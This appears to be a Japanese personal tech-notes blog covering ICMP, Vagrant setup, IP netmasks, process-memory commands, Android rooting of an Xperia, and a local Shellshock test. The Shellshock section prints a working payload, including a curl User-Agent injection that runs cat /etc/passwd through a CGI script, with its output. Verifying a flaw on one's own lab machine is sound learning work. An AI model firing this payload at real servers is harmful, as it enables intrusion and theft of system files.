ICMP 備忘録

ICMP

名称 Internet Control Message Protcol
使用されるソフトウェア ping , traceroute
OSIモデル階層 ネットワーク層
目的 IPプロトコルを使用した際のエラー通知の転送、制御メッセージの転送

フォーマット

更新中

メッセージ

更新中

shell shock 検証1

検証環境

OS:ubuntu 12.04

事前準備

手順

1.脆弱性検証コマンド

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

2.結果

vulnerable
this is a test

参考:
第4回 わずか1週間程度でBashが大幅な進化を遂げた ~Shellshock大暴れ~:インフラセキュリティの処方箋|gihyo.jp … 技術評論社

HTTP経由での実行

1. cgi作成

#!/bin/bash

echo 'Content-Type:text/html
<html>
<head>
<title>Hello World!</title>
</head>
<body>Hello World!!!</body>
</html>

2.検証コマンド

curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/test.cgi

3.結果確認

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
                ・
                ・

参考:Vagrantですぐに体験するbashのShellShock脆弱性の恐さ - Qiita

Android root化 備忘

環境

Android

  • XPeria AX SO-01e
  • OS ver : 9.1.C.1.186

PC

(ゲスト)OS: Windows 8.1

手順

1.adbコマンド実行環境を設定

参照:Windows 8.1でadbコマンドを使えるようにする簡単な方法を紹介


 android実行環境を設定するため、jdkをインストール

1-1.jdk をインストール
1-2.android DL : Android Studio

※ 画面の下のほうにSDK Tools Only のzipがあるが、platform-toolsが入っていないためこちらを選ぶ

1-3. システム環境変数

Windowsマイコンピューター 右クリ >プロパティ > 設定の変更 > 詳細設定tab > 環境変数 > TEMP > path > 編集
以下を追加

[展開したパッケージ¥toolのフルpath];[展開したパッケージ¥platform-toolsのフルpath]
1-4. パス確認

コマンドプロンプトで以下 コマンド入力

path

path :追加したpath が出力される
確認したらマシンreboot

2. adbドライバをインストール設定

android をPCに接続し、Sony PC Companionをインストール
※USBでのPC接続では、ケーブルによって充電しかできないものがある

2-1 .PCにADB Inter FaceDriver をインストール

PCに接続するとスマホ画面に「Sony PC Companionをインストールしますか」と表示されるので「YES」

2-2 .PC側『デバイスとドライブ』に 【Sony PC Software】が表示されるので、クリックし実行

※もしくは『ドライバをインストールしています』と表示され自動実行
インストール完了すると、自動的に起動する。起動確認後に、マシンリブート。
参照:http://www.teradas.net/archives/9931/

2-3. Windowsの『ドライバー署名の強制』を無効化にする
「電源オプション」をクリック > Shift + 再起動をクリック
 > [トラブルシューティング]  >[詳細オプション] >[Windowsのスタートアップ設定] >[再起動] 
起動後、「7」を押して「ドライバー署名の強制を無効にする」

Windows起動後、デバイスマネージャから「Sony sa0106」 > [ADB Inter FaceDriver]を確認

3. tft をDL

SO-01E 9.1.C.1.103,186 のFTFを準備
参照:Xperia FTF

4.Flashtool インストール

参照:【XPERIA】Flashtoolの使い方 - NAVER まとめ
※インストール項目だけでなく、次ページ以降の使い方も参考になる

4-1.Flash tool用driverインストール

 ※これがないとrootKit実行の前にflashができない

5.スマホのkernelのみflash(9.1.C.1.103)

 flash toolの使い方は手順4のリンク参照
 ※flash前に端末は電源OFF
 ※USB認識は音量小しながら再接続

6. rootkit DL

DL:キューブ実験室: 【Xperia】各機種ワンクリックroot取得【NX/acro HD/GX/SX ~ Z2/A2 等】

7.rootKit実行

rootKitを解凍して、install.bat実行
正常終了したら、USBから外して端末起動「SuperSU」が入っていることを確認

8.スマホのkernelのみflash(9.1.C.1.186)

手順5と同じ
完了したらroot化成功

Vagrant と VirtualBox 備忘

手順

1.VirtualBox をDL&インストール

2.Vagrant をDL&インストール

 インストール確認
 vagrant  --version

3.VM 用フォルダ作成

 mkdir  test 
 cd test

4.VagrantFile作成

でVagrantFileを作成
  initの引数にロードするVagrantFileを指定できる(指定しない場合は自分で内容を設定することになる)

 vagrant init ubuntu/trusty64

Getting Started - Vagrant Documentation
仮想環境構築ツール「Vagrant」で開発環境を仮想マシン上に自動作成する 2ページ | OSDN Magazine
Discover Vagrant Boxes | Atlas by HashiCorp

5.VM起動

 vagrant up 

エラーなければOK. UIなしで起動している状態。VirtualBoxVM作成されていること&起動していることを確認できる
その他の起動&停止

 vagrant halt
 vagrant suspend
 vagrant reload

7.VMネットワーク設定

ホストだけでなく外部OSからも接続できるようにする。(IPふる時はマスクを考慮する)
VagrantとDockerについて名前しか知らなかったので試した - Qiita

Vagrantfile編集
  config.vm.network "public_network", ip: "192.168.179.10", :netmask => "255.255.255.0", :bridge => "en0: Wi-Fi (AirPort)"
リロード
 vagrant reload

接続確認はping

IPアドレス割り当て 備忘録

IPアドレス

IP アドレス
IPアドレスは32bit(8bit4つ)で表現される。
xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxx
↑左から『ネットワーク・アドレス』と『ホスト・アドレス』にわけ、ネットワークの分類とネットワーク内ホストを一度に表現している

ネットマスク(サブネットマスク

ネットマスク IPアドレスからネットワークアドレスを抽出するための値
IPアドレスと同じ32bitで表現され、ネットワークアドレスとみなす部分はすべて1として表す。これはAND演算を行うためである
抽出方法 AND演算によりIPアドレスからネットワークアドレスを抽出
(255.255.255.0の場合)
IPアドレス :11000000.10101000.00000001.10000000
ネットマスク:11111111.11111111.11111111.00000000
AND演算は共に1の場合のみ1として返すため、足し合わせると左側のマスク部分のみが抽出される

一覧

名前 説明
ネットワークアドレス LANなどで繋がったネットワーク全体を表すアドレス
ホスト部分は全て0bitで表す
192.168.10.0(ネットワークアドレスは192.168.10)
172.16.0.0 (ネットワークアドレス)
ブロードキャストアドレス ネットワークに属するホスト全てを指定する際のアドレス
ホスト部分は全て1bitで表す
192.168.10.255
255 = 1111(2bit表記)
ループバックアドレス 127.0.0.1のこと
自分自身を表す
127.0.0.1 (ホスト名:localhost)
グローバルアドレス インターネットで割り当てられたアドレス いろいろ
プライベートアドレス ネットワーク内で割り当てられたアドレス 192.168.10.20

サブネットマスク

アドレスの上位何bitがネットワークアドレスであるかを定義する32bit数値
アドレスの後に/をつけて表す

ex 192.160.10.255/24 上位24bitがネットワークアドレス

プロセスのメモリ確認 備忘

コマンド

ps

:プロセス情報

ps aux
a:sオプションと使用することで全てのプロセスを表示
u:ユーザー名

pmap

: プロセス毎のメモリマップ情報

pmap -x [PID]
x:拡張モード

cat

: ファイルの連結と標準出力用

cat /proc/[PID]/smaps
smapは仮想メモリの各アドレスにマッピングされた状態を確認できる

top

: システム利用状況

top